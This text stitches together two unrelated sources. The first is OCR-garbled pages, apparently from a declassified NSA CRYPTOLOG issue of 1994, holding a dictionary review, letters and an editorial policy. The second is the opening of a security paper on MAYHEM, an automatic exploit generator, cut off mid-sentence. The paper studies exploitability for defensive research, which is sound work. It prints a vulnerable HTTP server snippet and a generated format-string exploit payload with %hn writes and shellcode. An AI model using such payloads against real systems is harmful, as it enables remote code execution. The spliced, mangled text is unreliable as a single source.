tionscomewithillustrations sothereaderisn'tnecessar­
ilythrownoffbyunfamiliar terms.P.L.86-36
(U)Infact,thereareillustrations (photosanddraw­
ingsinbothblack-and-white andcolor)onalmostevery
page.Somearen'tasdetailedwhencompared tothe
"AI-Mughni Al-Kabir" English/Arabic dictionary, but
thecollection inthe"Sci/Tech Terms"isbroaderand
quitesatisfactory. Withinthediagrammed illustration of
anautomobile, forinstance, thereaderwillnotseea
steeringwheelhighlighted withboththeEnglishand
Arabicwordforitsidebyside,butwillseetheillustra­
tionwithabriefdescription ofwhat'sbeingpicturedon
themargininbothEnglishandArabic.
(U)Therearecomprehensive tablesinthebackof
thebookwhichcoversuchitemsastheGeological Time
Scale,equivalent Centigrade andFahrenheit tempera­
tures,theelements andtheirphysical properties, and4­
placecommon logarithms, tonameafew.
(U)Thereisoneratherirritating problemthatIdis­
covered whilesearching fornuclear-related terms:
pages401-416aremissing. Page400endswith"Nitro­
genFixation" andpage417beginswithacharton
"Optics." Ihopetheproblemisjustwithmycopyand
notwiththeentirepressing.
(PO:YO~Inclosing,letmesayagainthatthisdictio­
nary,becauseofitsdepthandbreadthofscientific and
technical terminology anditsadherence totraditional
Arabicrootswherepossible, isavaluable linguistic
assettoeithertheeducated non-native Englishspeaker,
ortheeducated non-native Arabicspeaker. Wewould
dowelltobuyit.
I
FOROFFICIAL USEONLT
26

DOCID: 4009689
TotheEditor:
l?>L.86-36SECRET SPOKE
CRYPTOLOG
March 1994
EO1.4.(c)
P..L.86-36
~There wasaninteresting juxtaposition ofarti­
clesinCRYPTOLOO's secondissueof1992,specifi-
cally "WhoAmIandWhatAmI
DoingHere?"and "OntheTaxonomy
oftheOyster." .scussedthedefinitions of
bookbreaking andcryptolinguistics andthequestionof
howtoensurefairrecognition ofthosewhoarefirmly
plantedinahybridoftwodemanding disciplines, whileI Irnfferentiated between conventional substi-
tutioncryptosystems andcodes.
~Indrawingthedistinction between substitution
andcodesystems.~ouched uponasignificant
aspecto~~ion. Codeshavetradition­
allybeenlumpedamongsubstitution systemsbypro­
cessofelimination, sincetheyclearlydonotfallintothe
transposition family.Theshortcoming inthis,however,
isthatitignoresafundamental difference inthepur­
posesofcodesandsubstitution schemes. Acodeisused
toaltertheappearance ofalanguage, whilethemore
conventional substitution systems areusedtoalterthe
appearance ofwords.Whilethismayseemsubtle,toa
bookbreaker itiscrucial.
SECRET SPOKE
27

DOCID: 4009689
CiiYPTOLOG
March 1994
288E€R-ET8PO{iE
~There arethornyquestions aplentytoaddress,
amongthembeing:Whatistobetheofficialdefinition
ofacryptolinguist? Whataretheessential skills?How
dowedevelopthoseskills?Howdowemeasurethem?
Howdowedetermining whatconstitutes "professional"
competence? Howdoweencourage diversity? Forthat
matter,doweencourage diversity? Howcanweiden­
tifytoursthatwillenhance acryptolinguist's career?
Howdoweidentifyandrecruitpotential cryptolin­
guists?Howdowekeepthem?
~Weneedtorecognize bookbreaking/cryptolin­
guisticsasadiscipline initsownright.Ms.Goodlin
touchedonanobstacle tothisrecognition whenshe
referredtoherlinguistfriendsandcolleagues consider­
inghertobeacryppiewhilehercryptanalyst friends
andcolleagues considered hertobealinguist. Thisatti­
tudeisharmless enoughinyourimmediate peers.I
thinkitimportant, though,thatwebeawareofand
respecttheuniquetalentsrequired, andappreciate that
neitherastrictlylanguage boardnotastrictlycryptana­
lyticboardistheappropriate vehicletoadequately
addressthedevelopment ofthisparticular setofcross­
disciplinarians.
__....IZ422
I
EO1.4.(c)
P.L.86-36
SECRE'f'SPOKEP.L.86-36

DOCID: 4009689CONFIDENCfIAL
CRYPTOLOG
March 1994
Government Communications Headquarters
RoomNoE.0603
PriorsRoadCheltenham GL525AJ
Telephone Cheltenham (0242)221491 ext2512
GTNNumber1366oxt2512
P.L.86-36.~~~--E(htnx
CRYPTOLOG
cloP0541,
NSA
CRYPTOLOG 3JIDISSUE1992Yourreference
Dale
2July1993
EO1.4.(d)
P.L.86-36
MayIpleasemaketwopointsaboutthearticlebyLambros Callimahos •A
Historyofcryptology"; asithappens bothrefertopage28.
First,hestalesthat"In1525,TheBritishlionbeginsfourcenturies ofsuccessful
cryptanalysis· .Thisgivestheimpression thattheBritisheffortmayhavestopped
around1925.Nothingcouldbefurtherformthetruth!AsjustaboutanyoneinZ
Groupwillsurelytestify,thefIfthcenturyofBritishcryptanalysis isinfullswingand
continues tobeaseffective asever...
Second, nobodyseemstoknowwhenorwherethislecturewasdelivered: but
Lambros saysthatBrigadier Tiltman wastheninthemiddleofhisfifthdecadeasa
cryptanalyst. IcanconfirmthattheBrigjoinedGC&CS (theprecursor ofGCHQ)on
1August1920,sothiswoulddatethelectureasmid-1960s.
Iwasprivileged tohearLambros lecturewhenIwasanintegreeinASinthelate
19608,andonanotherdayhegaveafloterecitalintheFriedman Auditorium. A
remarkable man,indeed.
L...- ..1 EO1.4.(d)
P.L.86-36
CONFIDEN'£I-AL
29

DOCID: 4009689
C;:;YPTOLOG
March 1994
CRYPTOLOG
Editorial Policy:TOPS~CgT m4BRt .....
CRY.PTOLOG isaforumfortheinformal exchange of
information bytheanalyticworkforce. Criteriaforpub­
licationare:thatintheopinionofthereviewers, readers
willfindthearticleusefulorinteresting; thatitisaccu­
rate;thatthetenninology iscorrectandappropriate to
thediscipline. Articlesmaybeclassified uptoand
including TSC.
Technical articlesarepreferred overnon-technical; clas­
sifiedoverunclassified; shorterarticlesover'longer.
Comments andlettersaresolicited. Weinvitereadersto
contribute conference reportsandreviewsofbooks,arti­
cles,software, andhardware thatpertaintoourmission
ortoanyofourdisciplines. Humoriswelcome, too.
Pleasenotethatwhilesubmissions maybepublished
anonymously, theidentityoftheauthormustbemade
knowntotheEditor.Unsigned lettersandarticlesare
discarded.
Howtosubmitanarticle:
N.B.Ifthefollowing instructions areamysterytoyou
andyourlocalADPsupportisnohelp,pleasefeelfree
tocalltheCRYPTOLOG editoron963-3123s.
Sendahardcopyaccompanied byadiskette(either3.5"
or5.25")totheeditoratP0541in2E062,Ops.1,or
sendviae-mailtomebutle@p.nsa. Formaximum effi­
ciency(asfaraspossiblewithinthelimitsofyourword
processor):
•donottypeyourarticleincapitalletters
•donotdouble-space betweenlines
•butdodouble-space betweenparagraphs
•donotindentforanewparagraph
•classifyallparagraphs
•donotformatanHDdisketteasDDorvice-versa
•labelyourdiskette: identifyhardware (operating sys­
tem:DOSorUNIX),densityofmedium, andwordpro­
cessor
•putyourname,organization, building andphonenum­
beronthediskette
CRYPTOLOG ispublished inFrameMaker onaSun
HPW.IfyoudonothaveaccesstoFrameMaker, ASCII
formatispreferred.
TOPSECRET ~fBRA
30
Unleashing M AYHEM on Binary Code
Sang Kil Cha, Thanassis Avgerinos, Alexandre Rebert and David Brumley
Carnegie Mellon University
Pittsburgh, PA
{sangkilc, thanassis, alexandre.rebert, dbrumley}@cmu.edu
Abstract —In this paper we present M AYHEM , a new sys-
tem for automatically finding exploitable bugs in binary (i.e.,
executable) programs. Every bug reported by M AYHEM is
accompanied by a working shell-spawning exploit. The workingexploits ensure soundness and that each bug report is security-critical and actionable. M
AYHEM works on raw binary code
without debugging information. To make exploit generation
possible at the binary-level, M AYHEM addresses two major
technical challenges: actively managing execution paths withoutexhausting memory, and reasoning about symbolic memory
indices, where a load or a store address depends on userinput. To this end, we propose two novel techniques: 1) hybridsymbolic execution for combining online and offline (concolic)execution to maximize the benefits of both techniques, and2) index-based memory modeling, a technique that allows
M
AYHEM to efficiently reason about symbolic memory at
the binary level. We used M AYHEM to find and demonstrate
29 exploitable vulnerabilities in both Linux and Windowsprograms, 2 of which were previously undocumented.
Keywords-hybrid execution, symbolic memory, index-based
memory modeling, exploit generation
I. I NTRODUCTION
Bugs are plentiful. For example, the Ubuntu Linux bug
management database currently lists over 90,000 open
bugs [ 17]. However, bugs that can be exploited by attackers
are typically the most serious, and should be patched first.
Thus, a central question is not whether a program has bugs,
but which bugs are exploitable.
In this paper we present M A YHEM , a sound system
for automatically finding exploitable bugs in binary (i.e.,
executable) programs. M AY H E M produces a working control-
hijack exploit for each bug it reports, thus guaranteeing each
bug report is actionable and security-critical. By working
with binary code M A YHEM enables even those without source
code access to check the (in)security of their software.
MA YHEM detects and generates exploits based on the
basic principles introduced in our previous work on AEG [ 2].
At a high-level, M AY H E M finds exploitable paths by aug-
menting symbolic execution [ 16] with additional constraints
at potentially vulnerable program points. The constraints
include details such as whether an instruction pointer can be
redirected, whether we can position attack code in memory,
and ultimately, whether we can execute attacker’s code. If the
resulting formula is satisfiable, then an exploit is possible.
A main challenge in exploit generation is exploring enough
of the state space of an application to find exploitable paths.In order to tackle this problem, M A YHEM ’s design is based
on four main principles: 1) the system should be able to
make forward progress for arbitrarily long times—ideally run
“forever”—without exceeding the given resources (especially
memory), 2) in order to maximize performance, the system
should not repeat work, 3) the system should not throw away
any work—previous analysis results of the system should
be reusable on subsequent runs, and 4) the system shouldbe able to reason about symbolic memory where a loador store address depends on user input. Handling memory
addresses is essential to exploit real-world bugs. Principle #1
is necessary for running complex applications, since most
non-trivial programs will contain a potentially infinite number
of paths to explore.
Current approaches to symbolic execution, e.g., CUTE [ 26],
BitBlaze [ 5], KLEE [ 9], SAGE [ 13], McV eto [ 27], AEG [ 2],
S2E [ 28], and others [ 3], [ 21], do not satisfy all the
above design points. Conceptually, current executors can be
divided into two main categories: offline executors — whichconcretely run a single execution path and then symbolically
execute it (also known as trace-based or concolic executors,
e.g., SAGE), and online executors — which try to execute
all possible paths in a single run of the system (e.g., S2E).
Neither online nor offline executors satisfy principles #1-#3.
In addition, most symbolic execution engines do not reason
about symbolic memory, thus do not meet principle #4.
Offline symbolic executors [ 5], [13] reason about a single
execution path at a time. Principle #1 is satisfied by iteratively
picking new paths to explore. Further, every run of thesystem is independent from the others and thus results of
previous runs can be immediately reused, satisfying principle
#3. However, offline does not satisfy principle #2. Every
run of the system needs to restart execution of the program
from the very beginning. Conceptually, the same instructionsneed to be executed repeatedly for every execution trace. Our
experimental results show that this re-execution can be very
expensive (see §VIII).
Online symbolic execution [ 9], [28] forks at each branch
point. Previous instructions are never re-executed, but thecontinued forking puts a strain on memory, slowing downthe execution engine as the number of branches increase.
The result is no forward progress and thus principles #1
and #3 are not met. Some online executors such as KLEE
stop forking to avoid being slowed down by their memory
2012 IEEE Symposium on Security and Privacy
© 2012, Sang Kil Cha. Under license to IEEE.
DOI 10.1109/SP.2012.31380

use. Such executors satisfy principle #1 but not principle #3
(interesting paths are potentially eliminated).
MAY H E M combines the best of both worlds by introduc-
ing hybrid symbolic execution, where execution alternates
between online and offline symbolic execution runs. Hybrid
execution acts like a memory manager in an OS, except
that it is designed to efficiently swap out symbolic execution
engines. When memory is under pressure, the hybrid engine
picks a running executor, and saves the current execution
state, and path formula. The thread is restored by restoring the
formula, concretely running the program up to the previous
execution state, and then continuing. Caching the path
formulas prevents the symbolic re-execution of instructions,
which is the bottleneck in offline, while managing memory
more efficiently than online execution.
MAY H E M also proposes techniques for efficiently reason-
ing about symbolic memory. A symbolic memory access
occurs when a load or store address depends on input. Sym-
bolic pointers are very common at the binary level, and being
able to reason about them is necessary to generate control-
hijack exploits. In fact, our experiments show that 40% of
the generated exploits would have been impossible due to
concretization constraints ( §VIII). To overcome this problem,
MA YHEM employs an index-based memory model ( §V) to
avoid constraining the index whenever possible.
Results are encouraging. While there is ample room for
new research, M A YHEM currently generates exploits for
several security vulnerabilities: buffer overflows, function
pointer overwrites, and format string vulnerabilities for
29 different programs. M A YHEM also demonstrates 2-10 ×
speedup over offline symbolic execution without having the
memory constraints of online symbolic execution.
Overall, M AY H E M makes the following contributions:
1) Hybrid execution. We introduce a new scheme for sym-
bolic execution—which we call hybrid symbolic execution—
that allows us to find a better balance between speed and
memory requirements. Hybrid execution enables M A YHEM
to explore multiple paths faster than existing approaches
(see§IV).
2) Index-based memory modeling. We propose index-based
memory model as a practical approach to dealing with
symbolic indices at the binary-level. (see §V).
3) Binary-only exploit generation. We present the first
end-to-end binary-only exploitable bug finding system that
demonstrates exploitability by outputting working control
hijack exploits.
II. O VERVIEW OF MA YHEM
In this section we describe the overall architecture, usage
scenario, and challenges for finding exploitable bugs. We use
an HTTP server, orzHttpd [1]—shown in Figure 1a—as
an example to highlight the main challenges and present how
MAY H E M works. Note that we show source for clarity and
simplicity; M A YHEM runs on binary code.1#define BUFSIZE 4096
2
3typedef struct {
4 char b u f [ BUFSIZE ] ;
5 int used ;
6}STATIC BUFFER t;
78typedef struct conn{
9 STATIC
BUFFER tr e a d buf ;
10 . . . // omitted
11}CONN t;
1213 static void serverlog (L O G
TYPE t type ,
14 const char ∗format , . . . )
15{
16 . . . // omitted
17 if( f o r m a t ! = NULL ) {
18 v a start (ap , format ) ;
1 9 vsprintf ( buf , format , ap ) ;
20 v a end ( ap ) ;
21}
2 2 fprintf (l o g , buf); // vulnerable point
2 3 fflush (log) ;
24}
2526 HTTP
STATE th t t p read request (C O N N t∗conn )
27{
28 . . . // omitted
29 while ( conn−>read buf . used < BUFSIZE ) {
3 0 sz = static buffer r e a d ( conn , &conn −>
read buf ) ;
31 if(s z< 0){
32 . . .33 conn −>read
buf . used += sz ;
34 if(m e m c m p(&conn −>read buf . buf [ conn −>
read buf . used ] − 4, ”\r\n\r\n” , 4) = =
0)
35 {
36 break ;
37 }
38}
39 if( conn−>read buf . used >= BUFSIZE ) {
40 conn −>status . st = HTTP STATUS 400 ;
41 return HTTP STATE ERROR ;
42}
43 . . .
4 4 serverlog (E R R O R LOG ,
45 ”%s\n” ,
46 conn−>read buf . buf ) ;
47 . . .
48}
(a) Code snippet.
...
buf ptr
log (file pointer)
fprintf frame pointer return addr to serverlog
...buf (in serverlog)serverlog frame pointer old ebp...
an exploit generated by 
Mayhem:
\x5c\xca\xff\xbf\x5e\xca\xff
\xbf%51832c%17$hn
%62847c%18$hn
\x90\x90 ... shellcodeaddressHigh
Low
(b) Stack diagram of the vulnerable program.
Figure 1: orzHttpd vulnerability
381
InorzHttpd , each HTTP connection is passed
tohttp_read_request . This routine in turn calls
static_buffer_read as part of the loop on line 29 to
get the user request string. The user input is placed into the
4096-byte buffer conn->read_buf.buf on line 30. Each
read increments the variable conn->read_buf.used by
the number of bytes read so far in order to prevent a buffer
overflow. The read loop continues until \r\n\r\n is found,
checked on line 34. If the user passes in more than 4096 bytes
without an HTTP end-of-line character, the read loop aborts
and the server returns a 400 error status message on line
41. Each non-error request gets logged via the serverlog
function.
The vulnerability itself is in serverlog , which calls
fprintf with a user specified format string (an HTTP
request). V ariadic functions such as fprintf use a format
string specifier to determine how to walk the stack looking
for arguments. An exploit for this vulnerability works by
supplying format strings that cause fprintf to walk the
stack to user-controlled data. The exploit then uses additional
format specifiers to write to the desired location [ 22].
Figure 1b shows the stack layout of orzHttpd when the
format string vulnerability is detected. There is a call to
fprintf and the formatting argument is a string of user-
controlled bytes.
We highlight several key points for finding exploitable
bugs:Low-level details matter:
Determining exploitability re-
quires that we reason about low-level details like returnaddresses and stack pointers. This is our motivation for
focusing on binary-level techniques.
There are an enormous number of paths: In the example,
there is a new path on every encounter of an if statement,
which can lead to an exponential path explosion. Additionally,
the number of paths in many portions of the code is related to
the size of the input. For example, memcmp unfolds a loop,
creating a new path for symbolic execution on each iteration.Longer inputs mean more conditions, more forks, and harder
scalability challenges. Unfortunately most exploits are notshort strings, e.g., in a buffer overflow typical exploits are
hundreds or thousands of bytes long.
The more checked paths, the better: To reach the ex-
ploitable fprintf bug in the example, M AY H E M needs to
reason through the loop, read input, fork a new interpreter
for every possible path and check for errors. Without careful
resource management, an engine can get bogged down with
too many symbolic execution threads because of the huge
number of possible execution paths.Execute as much natively as possible:
Symbolic execution
is slow compared to concrete execution since the semantics
of an instruction are simulated in software. In orzHttpd ,
millions of instructions set up the basic server before an
attacker can even connect to a socket. We want to execute
these instructions concretely and then switch to symbolicTest
Cases
BinaryMayhem
Buggy
InputsTaint Tracker(CEC)
Concrete Execution Client
Symbolic
Evaluator
Path Selector
Checkpoint
Manager(SES)
Symbolic Execution Server
Check
PointsDynamic Binary 
Instrumentator
(DBI)Exploits Exploit Generator
Virtualization
Layer
Operating 
System
HardwareInput
Spec.
Target
Machine
Figure 2: M A YHEM architecture
execution.
The M A YHEM architecture for finding exploitable bugs is
shown in Figure 2. The user starts M A YHEM by running:
mayhem -sym-net 80 400 ./orzhttpd
The command-line tells M A YHEM to symbolically execute
orzHttpd , and open sockets on port 80 to receive symbolic
400-byte long packets. All remaining steps to create an exploit
are performed automatically.
MAY H E M consists of two concurrently running processes:
aConcrete Executor Client (CEC), which executes code
natively on a CPU, and a Symbolic Executor Server (SES).
Both are shown in Figure 2. At a high level, the CEC runs on
a target system, and the SES runs on any platform, waiting
for connections from the CEC. The CEC takes in a binary
program along with the potential symbolic sources (inputspecification) as an input, and begins communication with
the SES. The SES then symbolically executes blocks that theCEC sends, and outputs several types of test cases including
normal test cases, crashes, and exploits. The steps followed
by M AY H E M to find the vulnerable code and generate an
exploit are:
1) The--sym-net 80 400 argument tells M AY H E M to
perform symbolic execution on data read in from a socket
on port 80. Effectively this is specifying which input
sources are potentially under attacker control. M A YHEM
can handle attacker input from environment variables, files,
and the network.
2) The CEC loads the vulnerable program and connects to
the SES to initialize all symbolic input sources. After the
initialization, M A YHEM executes the binary concretely on
the CPU in the CEC. During execution, the CEC instru-
ments the code and performs dynamic taint analysis [ 23].
Our taint tracking engine checks if a block contains tainted
instructions, where a block is a sequence of instructions
that ends with a conditional jump or a call instruction.
3) When the CEC encounters a tainted branch condition or
jump target, it suspends concrete execution. A tainted
jump means that the target may be dependent on attacker
382
input. The CEC sends the instructions to the SES and the
SES determines which branches are feasible. The CEC
will later receive the next branch target to explore from
the SES.
4) The SES, running in parallel with the CEC, receives a
stream of tainted instructions from the CEC. The SESjits the instructions to an intermediate language (
§III),
and symbolically executes the corresponding IL. The
CEC provides any concrete values whenever needed, e.g.,
when an instruction operates on a symbolic operand and
a concrete operand. The SES maintains two types of
formulas:
Path F ormula: The path formula reflects the constraints to
reach a particular line of code. Each conditional jump adds
a new constraint on the input. For example, lines 32-33
create two new paths: one which is constrained so that the
read input ends in an \r\n\r\n and line 35 is executed,
and one where the input does not end in \r\n\r\n and
line 28 will be executed.Exploitability F ormula: The exploitability formula deter-
mines whether i) the attacker can gain control of the
instruction pointer, and ii) execute a payload.
5) When M AY H E M hits a tainted branch point, the SES
decides whether we need to fork execution by querying
the SMT solver. If we need to fork execution, all thenew forks are sent to the path selector to be prioritized.
Upon picking a path, the SES notifies the CEC about the
change and the corresponding execution state is restored.
If the system resource cap is reached, then the checkpoint
manager starts generating checkpoints instead of forking
new executors ( §IV). At the end of the process, test cases
are generated for the terminated executors and the SES
informs the CEC about which checkpoint should continue
execution next.
6) During the execution, the SES switches context between
executors and the CEC checkpoints/restores the provided
execution state and continues execution. To do so, the CECmaintains a virtualization layer to handle the program inter-
action with the underlying system and checkpoint/restore
between multiple program execution states (§IV -C).
7) When M A YHEM detects a tainted jump instruction, it
builds an exploitability formula, and queries an SMTsolver to see if it is satisfiable. A satisfying input will
be, by construction, an exploit. If no exploit is found on
the tainted branch instruction, the SES keeps exploring
execution paths.
8) The above steps are performed at each branch until an
exploitable bug is found, M AY H E M hits a user-specified
maximum runtime, or all paths are exhausted.
III. B ACKGROUND
Binary Representation in our language. Basic symbolic
execution is performed on assembly instructions as they
execute. In the overall system the stream comes from the CECas explained earlier; here we assume they are simply given
to us. We leverage BAP [ 15], an open-source binary analysis
framework to convert x86 assembly to an intermediate
language suitable for symbolic execution. For each instruction
executed, the symbolic executor jits the instruction to the
BAP IL. The SES performs symbolic execution directly on
the IL, introduces additional constraints related to specific
attack payloads, and sends the formula to an SMT solver to
check satisfiability. For example, the IL for a ret instruction
consists of two statements: one that loads an address from
memory, and one that jumps to that address.
Symbolic Execution on the IL. In concrete execution, the
program is given a concrete value as input, it executes
statements to produce new values, and terminates with final
values. In symbolic execution we do not restrict execution to a
single value, but instead provide a symbolic input variable that
represents the set of all possible input values. The symbolic
execution engine evaluates expressions for each statement
in terms of the original symbolic inputs. When symbolicexecution hits a branch, it considers two possible worlds:
one where the true branch target is followed and one where
the false branch target is followed. It does so by forking off
an interpreter for each branch and asserting in the generated
formula that the branch guard must be satisfied. The final
formula encapsulates all branch conditions that must be met
to execute the given path, thus is called the path formula or
path predicate.
In M AY H E M , each IL statement type has a corresponding
symbolic execution rule. Assertions in the IL are immediatelyappended to the formula. Conditional jump statements create
two formulas: one where the branch guard is asserted true
and the true branch is followed, and one which asserts the
negation of the guard and the false branch is followed. For
example, if we already have formula fand execute cjmp
e1,e2,e3wheree1is the branch guard and e2ande3
are jump targets, then we create the two formulas:
f∧e1∧FSE (path e2)
f∧¬e1∧FSE (path e3)
whereFSE stands for forward symbolic execution of the
jump target. Due to space, we give the exact semantics in a
companion paper [15], [24].
IV . H YBRID SYMBOLIC EXECUTION
MA YHEM is a hybrid symbolic execution system. Instead
of running in pure online or offline execution mode, M AY-
HEM can alternate between modes. In this section we present
the motivation and mechanics of hybrid execution.
A. Previous Symbolic Execution Systems
Offline symbolic execution—as found in systems such as
SAGE [ 13] —requires two inputs: the target program and an
initial seed input. In the first step, offline systems concretely
execute the program on the seed input and record a trace. In
383
1
2millions of 
instructions
1
234Offline Online
3millions of 
instructions
4
1
2Hybrid
3millions of 
instructions
4
Figure 3: Hybrid execution tries to combine the speed of
online execution and the memory use of offline execution to
efficiently explore the input space.
 0 0.2 0.4 0.6 0.8 1 1.2 1.4
5.0 x 1051.0 x 1061.5 x 1062.0 x 1062.5 x 1063.0 x 106Testcase gen. throughput (num/sec.)
Memory Use (KBytes)
Figure 4: Online execution throughput versus memory use.
the second step, they symbolically execute the instructions in
the recorded trace. This approach is called concolic execution,
a juxtaposition of concrete and symbolic execution. Offline
execution is attractive because of its simplicity and low
resource requirements; we only need to handle a single
execution path at a time.
The top-left diagram of Figure 3 highlights an immediate
drawback of this approach. For every explored execution path,
we need to first re-execute a (potentially) very large number
of instructions until we reach the symbolic condition where
execution forked, and then begin to explore new instructions.
Online symbolic execution avoids this re-execution cost
by forking two interpreters at branch points, each one having
a copy of the current execution state. Thus, to explore a
different path, online execution simply needs to perform a
context switch to the execution state of a suspended interpreter.
S2E [ 28], KLEE [ 9] and AEG [ 2] follow this approach by
performing online symbolic execution on LL VM bytecode.
However, forking off a new executor at each branch can
quickly strain the memory, causing the entire system to grindto a halt. State-of-the-art online executors try to address this
problem with aggressive copy-on-write optimizations. For
example, KLEE has an immutable state representation and
S2E shares common state between snapshots of physicalmemory and disks. Nonetheless, since all execution statesare kept in memory simultaneously, eventually all online
executors will reach the memory cap. The problem can be
mitigated by using DFS (Depth-First-Search)—however, this
is not a very useful strategy in practice. To demonstrate the
problem, we downloaded S2E [ 28] and ran it on a coreutils
application ( echo ) with 2 symbolic arguments, each one
10 bytes long. Figure 4 shows how the symbolic execution
throughput (number of test cases generated per second) is
slowed down as the memory use increases.
B. Hybrid Symbolic Execution
MA YHEM introduces hybrid symbolic execution to actively
manage memory without constantly re-executing the same
instructions. Hybrid symbolic execution alternates between
online and offline modes to maximize the effectiveness of
each mode. M A YHEM starts analysis in online mode. When
the system reaches a memory cap, it switches to offline mode
and does not fork any more executors. Instead, it produces
checkpoints to start new online executions later on. The crux
of the system is to distribute the online execution tasks into
subtasks without losing potentially interesting paths. The
hybrid execution algorithm employed by M AY H E M is split
into four main phases:
1. Initialization: The first time M AY H E M is invoked for a
program, it initializes the checkpoint manager, the checkpoint
database, and test case directories. It then starts online
execution of the program and moves to the next phase.
2. Online Exploration: During the online phase, M A YHEM
symbolically executes the program in an online fashion,context-switching between current active execution states,
and generating test cases.3. Checkpointing:
The checkpoint manager monitors online
execution. Whenever the memory utilization reaches a cap,
or the number of running executors exceeds a threshold, it
will select and generate a checkpoint for an active executor.
A checkpoint contains the symbolic execution state of the
suspended executor (path predicate, statistics, etc.) and replayinformation
1. The concrete execution state is discarded. When
the online execution eventually finishes all active execution
paths, M AY H E M moves to the next phase.
4. Checkpoint Restoration: The checkpoint manager selects
a checkpoint based on a ranking heuristic IV -D and restores
it in memory. Since the symbolic execution state was saved
in the checkpoint, M A YHEM only needs to re-construct the
concrete execution state. To do so, M AY H E M concretely
executes the program using one satisfiable assignment of
the path predicate as input, until the program reaches the
instruction when the execution state was suspended. At that
point, the concrete state is restored and the online exploration
(phase 2) restarts. Note that phase 4 avoids symbolically re-
executing instructions during the checkpoint restoration phase
1Note that the term “checkpoint” differs from an offline execution “seed”,
which is just a concrete input.
384
(unlike standard concolic execution), and the re-execution
happens concretely. Figure 3 shows the intuition behind
hybrid execution. We provide a detailed comparison between
online, offline, and hybrid execution in §VIII-C.
C. Design and Implementation of the CEC
The CEC takes in the binary program, a list of input
sources to be considered symbolic, and an optional check-
point input that contains execution state information from
a previous run. The CEC concretely executes the program,
hooks input sources and performs taint analysis on input
variables. Every basic block that contains tainted instructions
is sent to the SES for symbolic execution. As a response,the CEC receives the address of the next basic block tobe executed and whether to save the current state as a
restoration point. Whenever an execution path is complete,
the CEC context-switches to an unexplored path selectedby the SES and continues execution. The CEC terminates
only if all possible execution paths have been explored or a
threshold is reached. If we provide a checkpoint, the CEC
first executes the program concretely until the checkpoint
and then continues execution as before.
Virtualization Layer. During an online execution run, the
CEC handles multiple concrete execution states of the
analyzed program simultaneously. Each concrete execution
state includes the current register context, memory andOS state (the OS state contains a snapshot of the virtualfilesystem, network and kernel state). Under the guidance
of the SES and the path selector, the CEC context switches
between different concrete execution states depending on the
symbolic executor that is currently active. The virtualization
layer mediates all system calls to the host OS and emulates
them. Keeping separate copies of the OS state ensures there
are no side-effects across different executions. For instance,
if one executor writes a value to a file, this modification
will only be visible to the current execution state—all other
executors will have a separate instance of the same file.Efficient State Snapshot.
Taking a full snapshot of the
concrete execution state at every fork is very expensive. To
mitigate the problem, CEC shares state across execution
states–similar to other systems [ 9], [28]. Whenever execution
forks, the new execution state reuses the state of the parent
execution. Subsequent modifications to the state are recorded
in the current execution.
D. Design and Implementation of the SES
The SES manages the symbolic execution environment
and decides which paths are executed by the CEC. The
environment consists of a symbolic executor for each path,
a path selector which determines which feasible path to run
next, and a checkpoint manager.
The SES caps the number of symbolic executors to keep in
memory. When the cap is reached, M A YHEM stops generating
new interpreters and produces checkpoints; execution statesthat will explore program paths that M A YHEM was unable
to explore in the first run due to the memory cap. Each
checkpoint is prioritized and used by M AY H E M to continue
exploration of these paths at a subsequent run. Thus, when all
pending execution paths terminate, M A YHEM selects a new
checkpoint and continues execution—until all checkpoints
are consumed and M AY H E M exits.
Each symbolic executor maintains two contexts (as state):
a variable context containing all symbolic register values
and temporaries, and a memory context keeping track of all
symbolic data in memory. Whenever execution forks, the
SES clones the current symbolic state (to keep memory low,
we keep the execution state immutable to take advantage of
copy-on-write optimizations—similar to previous work [ 9],
[28]) and adds a new symbolic executor to a priority queue.
This priority queue is regularly updated by our path selector
to include the latest changes (e.g., which paths were explored,
instructions covered, and so on).
Preconditioned Symbolic Execution: MAY H E M imple-
ments preconditioned symbolic execution as in AEG [ 2].
In preconditioned symbolic execution, a user can optionally
give a partial specification of the input, such as a prefix
or length of the input, to reduce the range of search space.
If a user does not provide a precondition, then SES triesto explore all feasible paths. This corresponds to the user
providing the minimum amount of information to the system.
Path Selection: MAY H E M applies path prioritization
heuristics—as found in systems such as SAGE [ 13] and
KLEE [ 9]—to decide which path should be explored next.
Currently, M AY H E M uses three heuristic ranking rules: a)
executors exploring new code (e.g., instead of executingknown code more times) have high priority, b) executors
that identify symbolic memory accesses have higher priority,
and c) execution paths where symbolic instruction pointers
are detected have the highest priority. The heuristics are
designed to prioritize paths that are most likely to contain a
bug. For instance, the first heuristic relies on the assumption
that previously explored code is less likely to contain a bug
than new code.
E. Performance Tuning
MA YHEM employs several optimizations to speed-up
symbolic execution. We present three optimizations that
were most effective: 1) independent formula, 2) algebraic
simplifications, and 3) taint analysis.
Similar to KLEE [ 9], M A YHEM splits the path predicate
to independent formulas to optimize solver queries. A
small implementation difference compared to KLEE is that
MA YHEM keeps a map from input variables to formulas at all
times. It is not constructed only for querying the solver (this
representation allows more optimizations §V). M A YHEM also
applies other standard optimizations as proposed by previoussystems such as the constraint subsumption optimization [
13],
a counter-example cache [ 9] and others. M AY H E M also
385
simplifies symbolic expressions and formulas by applying
algebraic simplifications, e.g. x⊕x=0 ,x&0=0 ,
and so on.
Recall from §IV -C ,M AY H E M uses taint analysis [ 11],
[23] to selectively execute instruction blocks that deal with
symbolic data. This optimization gives a 8× speedup on
average over executing all instruction blocks (see §VIII-G).
V. I NDEX -BASED MEMORY MODELING
MA YHEM introduces an index-based memory model as a
practical approach to handling symbolic memory loads. The
index-based model allows M A YHEM to adapt its treatment
of symbolic memory based on the value of the index. In this
section we present the entire memory model of M A YHEM .
MA YHEM models memory as a map μ:I→Efrom 32-
bit indices ( i) to expressions ( e). In a load(μ ,i) expression,
we say that index iindexes memoryμ, and the loaded value
erepresents the contents of theithmemory cell. A load with
a concrete index iis directly translated by M AY H E M into
an appropriate lookup in μ(i.e.,μ[i]). Astore(μ, i,e)
instruction results in a new memory μ[i←e]whereiis
mapped to e.
A. Previous Work & Symbolic Index Modeling
A symbolic index occurs when the index used in a memory
lookup is not a number, but an expression—a pattern thatappears very frequently in binary code. For example, a C
switch(c) statement is compiled down to a jump-table
lookup where the input character cis used as the index.
Standard string conversion functions (such as ASCII to
Unicode and vice versa, to_lower ,to_upper , etc.) are
all in this category.
Handling arbitrary symbolic indices is notoriously hard,
since a symbolic index may (in the worst case) reference any
cell in memory. Previous research and state-of-the-art tools
indicate that there are two main approaches for handling a
symbolic index: a) concretizing the index and b) allowing
memory to be fully symbolic.
First, concretizing means instead of reasoning about
all possible values that could be indexed in memory, we
